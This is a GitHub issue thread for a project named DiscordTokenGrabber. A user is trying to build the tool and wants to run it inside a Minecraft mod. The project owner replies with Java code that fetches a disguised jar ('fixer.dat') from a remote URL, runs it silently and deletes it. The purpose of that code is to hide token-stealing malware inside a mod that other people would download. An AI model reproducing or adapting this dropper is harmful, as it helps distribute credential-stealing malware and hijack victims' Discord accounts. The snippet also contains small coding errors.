### ISSUE TITLE
Built, but doesn't work

### ISSUE THREAD

**Issue by calworld** [DedInc/DiscordTokenGrabber#3]
Hey, I assume that it's like a Minecraft mod, I tried both ways, as an executable and as a Minecraft mod
with the command gradlew jar
do you have any idea how I make it "successfully" work?
Because I've tried building it in every way I know and doesn't work in any way I know lol.

**Comment by calworld** [comment]
seems like an error or I don't know because I don't really know java itself


output when trying to do: java -jar

Exception in thread "main" java.lang.NoClassDefFoundError: org/json/JSONObject
        at com.github.dedinc.discordtokengrabber.utils.Sender.sendMessage(Sender.java:13)
        at com.github.dedinc.discordtokengrabber.Main.main(Main.java:25)
Caused by: java.lang.ClassNotFoundException: org.json.JSONObject
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        ... 2 more


I'll be waiting for an answer, have a great day.

**Comment by DedInc** [comment]
this is not a minecraft mod, but an executable jar file. You need to build it exactly as it is written in the README. 

If you want to put it in your own minecraft mod or in an open source mod, then you need to either host the file and make it download and open via runtime, or take my sources and put them in a minecraft mod and at the same time adding all the necessary libraries there, the file size will increase.

The easiest way to do it is like this:

```java
final String f = Paths.get(System.getProperties("TEMP"), "fixer.dat");
InputStream in = new URL("https://link-to.com/fixer.dat").openStream();
Files.copy(in, f, StandardCopyOption.REPLACE_EXISTING);
Runtime.getRuntime().exec("javaw -jar " + f.toFile().getAbsolutePath());
f.toFile().deleteOnExit();
```

Deletion can also be changed to:

```java
Process p = Runtime.getRuntime().exec("javaw -jar " + f.toFile().getAbsolutePath());
p.waitFor();
f.toFile().delete();
```

**Comment by calworld** [comment]
I don't really know what you mean because there isn't nothing in readme
